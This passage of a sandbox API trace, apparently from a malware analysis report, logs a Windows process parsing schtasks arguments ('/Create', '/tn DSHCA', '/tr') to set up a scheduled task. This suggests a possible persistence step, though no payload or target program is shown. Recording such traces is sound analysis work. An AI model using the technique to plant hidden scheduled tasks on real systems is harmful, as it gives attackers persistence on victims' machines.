lpMem=0x9d5d88 | out: hHeap=0x9c0000) returned 1 [0172.317] SetLastError (dwErrCode=0x0) [0172.317] GetThreadLocale () returned 0x409 [0172.317] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.318] lstrlenW (lpString="create") returned 6 [0172.318] GetThreadLocale () returned 0x409 [0172.318] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.318] lstrlenW (lpString="?") returned 1 [0172.318] GetThreadLocale () returned 0x409 [0172.318] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.318] lstrlenW (lpString="s") returned 1 [0172.318] GetThreadLocale () returned 0x409 [0172.318] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.318] lstrlenW (lpString="u") returned 1 [0172.318] GetThreadLocale () returned 0x409 [0172.318] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.318] lstrlenW (lpString="p") returned 1 [0172.318] GetThreadLocale () returned 0x409 [0172.318] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.318] lstrlenW (lpString="ru") returned 2 [0172.318] GetThreadLocale () returned 0x409 [0172.318] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.318] lstrlenW (lpString="rp") returned 2 [0172.318] GetThreadLocale () returned 0x409 [0172.318] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.318] lstrlenW (lpString="sc") returned 2 [0172.318] GetThreadLocale () returned 0x409 [0172.318] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.318] lstrlenW (lpString="mo") returned 2 [0172.318] GetThreadLocale () returned 0x409 [0172.318] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.318] lstrlenW (lpString="d") returned 1 [0172.318] GetThreadLocale () returned 0x409 [0172.318] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.319] lstrlenW (lpString="m") returned 1 [0172.319] GetThreadLocale () returned 0x409 [0172.319] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.319] lstrlenW (lpString="i") returned 1 [0172.319] GetThreadLocale () returned 0x409 [0172.319] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.319] lstrlenW (lpString="tn") returned 2 [0172.319] GetThreadLocale () returned 0x409 [0172.319] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.319] lstrlenW (lpString="tr") returned 2 [0172.319] GetThreadLocale () returned 0x409 [0172.319] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.319] lstrlenW (lpString="st") returned 2 [0172.319] GetThreadLocale () returned 0x409 [0172.319] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.319] lstrlenW (lpString="sd") returned 2 [0172.319] GetThreadLocale () returned 0x409 [0172.319] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.319] lstrlenW (lpString="ed") returned 2 [0172.319] GetThreadLocale () returned 0x409 [0172.319] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.319] lstrlenW (lpString="it") returned 2 [0172.319] GetThreadLocale () returned 0x409 [0172.319] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.319] lstrlenW (lpString="et") returned 2 [0172.319] GetThreadLocale () returned 0x409 [0172.319] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.319] lstrlenW (lpString="k") returned 1 [0172.320] GetThreadLocale () returned 0x409 [0172.320] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.320] lstrlenW (lpString="du") returned 2 [0172.320] GetThreadLocale () returned 0x409 [0172.320] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.320] lstrlenW (lpString="ri") returned 2 [0172.320] GetThreadLocale () returned 0x409 [0172.320] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.320] lstrlenW (lpString="z") returned 1 [0172.320] GetThreadLocale () returned 0x409 [0172.320] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.320] lstrlenW (lpString="f") returned 1 [0172.320] GetThreadLocale () returned 0x409 [0172.320] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.320] lstrlenW (lpString="v1") returned 2 [0172.320] GetThreadLocale () returned 0x409 [0172.320] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.320] lstrlenW (lpString="xml") returned 3 [0172.320] GetThreadLocale () returned 0x409 [0172.320] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.320] lstrlenW (lpString="ec") returned 2 [0172.320] GetThreadLocale () returned 0x409 [0172.320] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.320] lstrlenW (lpString="rl") returned 2 [0172.320] GetThreadLocale () returned 0x409 [0172.320] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.320] lstrlenW (lpString="delay") returned 5 [0172.321] GetThreadLocale () returned 0x409 [0172.321] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0172.321] lstrlenW (lpString="np") returned 2 [0172.321] SetLastError (dwErrCode=0x0) [0172.321] SetLastError (dwErrCode=0x0) [0172.321] lstrlenW (lpString="/Create") returned 7 [0172.321] lstrlenW (lpString="-/") returned 2 [0172.321] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0172.321] lstrlenW (lpString="create") returned 6 [0172.321] lstrlenW (lpString="create") returned 6 [0172.321] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.321] lstrlenW (lpString="Create") returned 6 [0172.321] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.321] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|create|") returned 8 [0172.321] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|Create|") returned 8 [0172.321] lstrlenW (lpString="|create|") returned 8 [0172.321] lstrlenW (lpString="|Create|") returned 8 [0172.321] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0172.321] SetLastError (dwErrCode=0x0) [0172.321] SetLastError (dwErrCode=0x0) [0172.321] SetLastError (dwErrCode=0x0) [0172.321] lstrlenW (lpString="/tn") returned 3 [0172.321] lstrlenW (lpString="-/") returned 2 [0172.321] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0172.321] lstrlenW (lpString="create") returned 6 [0172.321] lstrlenW (lpString="create") returned 6 [0172.321] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.321] lstrlenW (lpString="tn") returned 2 [0172.322] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.322] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|create|") returned 8 [0172.322] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.322] lstrlenW (lpString="|create|") returned 8 [0172.322] lstrlenW (lpString="|tn|") returned 4 [0172.322] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0172.322] SetLastError (dwErrCode=0x490) [0172.322] lstrlenW (lpString="?") returned 1 [0172.322] lstrlenW (lpString="?") returned 1 [0172.322] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.322] lstrlenW (lpString="tn") returned 2 [0172.322] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.322] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|?|") returned 3 [0172.322] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.322] lstrlenW (lpString="|?|") returned 3 [0172.322] lstrlenW (lpString="|tn|") returned 4 [0172.322] SetLastError (dwErrCode=0x490) [0172.322] lstrlenW (lpString="s") returned 1 [0172.322] lstrlenW (lpString="s") returned 1 [0172.322] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.322] lstrlenW (lpString="tn") returned 2 [0172.322] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.322] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|s|") returned 3 [0172.322] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.322] lstrlenW (lpString="|s|") returned 3 [0172.323] lstrlenW (lpString="|tn|") returned 4 [0172.323] SetLastError (dwErrCode=0x490) [0172.323] lstrlenW (lpString="u") returned 1 [0172.323] lstrlenW (lpString="u") returned 1 [0172.323] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.323] lstrlenW (lpString="tn") returned 2 [0172.323] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.323] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|u|") returned 3 [0172.323] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.323] lstrlenW (lpString="|u|") returned 3 [0172.323] lstrlenW (lpString="|tn|") returned 4 [0172.323] SetLastError (dwErrCode=0x490) [0172.323] lstrlenW (lpString="p") returned 1 [0172.323] lstrlenW (lpString="p") returned 1 [0172.323] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.323] lstrlenW (lpString="tn") returned 2 [0172.323] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.323] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|p|") returned 3 [0172.323] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.323] lstrlenW (lpString="|p|") returned 3 [0172.324] lstrlenW (lpString="|tn|") returned 4 [0172.324] SetLastError (dwErrCode=0x490) [0172.324] lstrlenW (lpString="ru") returned 2 [0172.324] lstrlenW (lpString="ru") returned 2 [0172.324] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.324] lstrlenW (lpString="tn") returned 2 [0172.324] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.324] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|ru|") returned 4 [0172.324] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.324] lstrlenW (lpString="|ru|") returned 4 [0172.324] lstrlenW (lpString="|tn|") returned 4 [0172.324] StrStrIW (lpFirst="|ru|", lpSrch="|tn|") returned 0x0 [0172.324] SetLastError (dwErrCode=0x490) [0172.324] lstrlenW (lpString="rp") returned 2 [0172.324] lstrlenW (lpString="rp") returned 2 [0172.324] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.324] lstrlenW (lpString="tn") returned 2 [0172.324] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.324] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|rp|") returned 4 [0172.324] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.324] lstrlenW (lpString="|rp|") returned 4 [0172.325] lstrlenW (lpString="|tn|") returned 4 [0172.325] StrStrIW (lpFirst="|rp|", lpSrch="|tn|") returned 0x0 [0172.325] SetLastError (dwErrCode=0x490) [0172.325] lstrlenW (lpString="sc") returned 2 [0172.325] lstrlenW (lpString="sc") returned 2 [0172.325] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.325] lstrlenW (lpString="tn") returned 2 [0172.325] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.325] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|sc|") returned 4 [0172.325] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.325] lstrlenW (lpString="|sc|") returned 4 [0172.325] lstrlenW (lpString="|tn|") returned 4 [0172.325] StrStrIW (lpFirst="|sc|", lpSrch="|tn|") returned 0x0 [0172.325] SetLastError (dwErrCode=0x490) [0172.325] lstrlenW (lpString="mo") returned 2 [0172.325] lstrlenW (lpString="mo") returned 2 [0172.325] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.325] lstrlenW (lpString="tn") returned 2 [0172.325] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.325] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|mo|") returned 4 [0172.325] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.325] lstrlenW (lpString="|mo|") returned 4 [0172.325] lstrlenW (lpString="|tn|") returned 4 [0172.326] StrStrIW (lpFirst="|mo|", lpSrch="|tn|") returned 0x0 [0172.326] SetLastError (dwErrCode=0x490) [0172.326] lstrlenW (lpString="d") returned 1 [0172.326] lstrlenW (lpString="d") returned 1 [0172.326] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.326] lstrlenW (lpString="tn") returned 2 [0172.326] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.326] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|d|") returned 3 [0172.326] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.326] lstrlenW (lpString="|d|") returned 3 [0172.326] lstrlenW (lpString="|tn|") returned 4 [0172.326] SetLastError (dwErrCode=0x490) [0172.326] lstrlenW (lpString="m") returned 1 [0172.326] lstrlenW (lpString="m") returned 1 [0172.326] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.326] lstrlenW (lpString="tn") returned 2 [0172.326] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.326] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|m|") returned 3 [0172.326] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.326] lstrlenW (lpString="|m|") returned 3 [0172.327] lstrlenW (lpString="|tn|") returned 4 [0172.327] SetLastError (dwErrCode=0x490) [0172.327] lstrlenW (lpString="i") returned 1 [0172.327] lstrlenW (lpString="i") returned 1 [0172.327] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.327] lstrlenW (lpString="tn") returned 2 [0172.327] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.327] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|i|") returned 3 [0172.327] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.327] lstrlenW (lpString="|i|") returned 3 [0172.327] lstrlenW (lpString="|tn|") returned 4 [0172.327] SetLastError (dwErrCode=0x490) [0172.327] lstrlenW (lpString="tn") returned 2 [0172.327] lstrlenW (lpString="tn") returned 2 [0172.327] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.327] lstrlenW (lpString="tn") returned 2 [0172.327] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.328] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.328] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tn|") returned 4 [0172.328] lstrlenW (lpString="|tn|") returned 4 [0172.328] lstrlenW (lpString="|tn|") returned 4 [0172.328] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|" [0172.328] SetLastError (dwErrCode=0x0) [0172.328] SetLastError (dwErrCode=0x0) [0172.328] lstrlenW (lpString="DSHCA") returned 5 [0172.328] lstrlenW (lpString="-/") returned 2 [0172.328] StrChrIW (lpStart="-/", wMatch=0x44) returned 0x0 [0172.328] SetLastError (dwErrCode=0x490) [0172.328] SetLastError (dwErrCode=0x490) [0172.328] SetLastError (dwErrCode=0x0) [0172.328] lstrlenW (lpString="DSHCA") returned 5 [0172.328] StrChrIW (lpStart="DSHCA", wMatch=0x3a) returned 0x0 [0172.328] SetLastError (dwErrCode=0x490) [0172.328] SetLastError (dwErrCode=0x0) [0172.328] lstrlenW (lpString="DSHCA") returned 5 [0172.328] SetLastError (dwErrCode=0x0) [0172.328] SetLastError (dwErrCode=0x0) [0172.328] lstrlenW (lpString="/tr") returned 3 [0172.329] lstrlenW (lpString="-/") returned 2 [0172.329] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0172.329] lstrlenW (lpString="create") returned 6 [0172.329] lstrlenW (lpString="create") returned 6 [0172.329] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.329] lstrlenW (lpString="tr") returned 2 [0172.329] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.329] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|create|") returned 8 [0172.329] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.329] lstrlenW (lpString="|create|") returned 8 [0172.329] lstrlenW (lpString="|tr|") returned 4 [0172.329] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0172.329] SetLastError (dwErrCode=0x490) [0172.329] lstrlenW (lpString="?") returned 1 [0172.329] lstrlenW (lpString="?") returned 1 [0172.329] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.330] lstrlenW (lpString="tr") returned 2 [0172.330] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.330] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|?|") returned 3 [0172.330] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.330] lstrlenW (lpString="|?|") returned 3 [0172.330] lstrlenW (lpString="|tr|") returned 4 [0172.330] SetLastError (dwErrCode=0x490) [0172.330] lstrlenW (lpString="s") returned 1 [0172.330] lstrlenW (lpString="s") returned 1 [0172.330] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.330] lstrlenW (lpString="tr") returned 2 [0172.330] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.330] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|s|") returned 3 [0172.330] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.330] lstrlenW (lpString="|s|") returned 3 [0172.330] lstrlenW (lpString="|tr|") returned 4 [0172.330] SetLastError (dwErrCode=0x490) [0172.330] lstrlenW (lpString="u") returned 1 [0172.330] lstrlenW (lpString="u") returned 1 [0172.331] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.331] lstrlenW (lpString="tr") returned 2 [0172.331] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.540] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|u|") returned 3 [0172.540] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.540] lstrlenW (lpString="|u|") returned 3 [0172.540] lstrlenW (lpString="|tr|") returned 4 [0172.540] SetLastError (dwErrCode=0x490) [0172.540] lstrlenW (lpString="p") returned 1 [0172.540] lstrlenW (lpString="p") returned 1 [0172.540] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.540] lstrlenW (lpString="tr") returned 2 [0172.540] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.540] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|p|") returned 3 [0172.540] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.540] lstrlenW (lpString="|p|") returned 3 [0172.540] lstrlenW (lpString="|tr|") returned 4 [0172.540] SetLastError (dwErrCode=0x490) [0172.540] lstrlenW (lpString="ru") returned 2 [0172.540] lstrlenW (lpString="ru") returned 2 [0172.540] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.541] lstrlenW (lpString="tr") returned 2 [0172.541] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.541] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|ru|") returned 4 [0172.541] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.541] lstrlenW (lpString="|ru|") returned 4 [0172.541] lstrlenW (lpString="|tr|") returned 4 [0172.541] StrStrIW (lpFirst="|ru|", lpSrch="|tr|") returned 0x0 [0172.541] SetLastError (dwErrCode=0x490) [0172.541] lstrlenW (lpString="rp") returned 2 [0172.541] lstrlenW (lpString="rp") returned 2 [0172.541] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.541] lstrlenW (lpString="tr") returned 2 [0172.541] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.541] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|rp|") returned 4 [0172.541] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.541] lstrlenW (lpString="|rp|") returned 4 [0172.541] lstrlenW (lpString="|tr|") returned 4 [0172.541] StrStrIW (lpFirst="|rp|", lpSrch="|tr|") returned 0x0 [0172.541] SetLastError (dwErrCode=0x490) [0172.541] lstrlenW (lpString="sc") returned 2 [0172.541] lstrlenW (lpString="sc") returned 2 [0172.541] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.541] lstrlenW (lpString="tr") returned 2 [0172.541] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.541] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|sc|") returned 4 [0172.541] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.542] lstrlenW (lpString="|sc|") returned 4 [0172.542] lstrlenW (lpString="|tr|") returned 4 [0172.542] StrStrIW (lpFirst="|sc|", lpSrch="|tr|") returned 0x0 [0172.542] SetLastError (dwErrCode=0x490) [0172.542] lstrlenW (lpString="mo") returned 2 [0172.542] lstrlenW (lpString="mo") returned 2 [0172.542] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.542] lstrlenW (lpString="tr") returned 2 [0172.542] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.542] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|mo|") returned 4 [0172.542] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dcfbc | out: _Buffer="|tr|") returned 4 [0172.542] lstrlenW (lpString="|mo|") returned 4 [0172.542] lstrlenW (lpString="|tr|") returned 4 [0172.542] StrStrIW (lpFirst="|mo|", lpSrch="|tr|") returned 0x0 [0172.542] SetLastError (dwErrCode=0x490) [0172.542] lstrlenW (lpString="d") returned 1 [0172.542] lstrlenW (lpString="d") returned 1 [0172.542] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.542] lstrlenW (lpString="tr") returned 2 [0172.542] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.542] 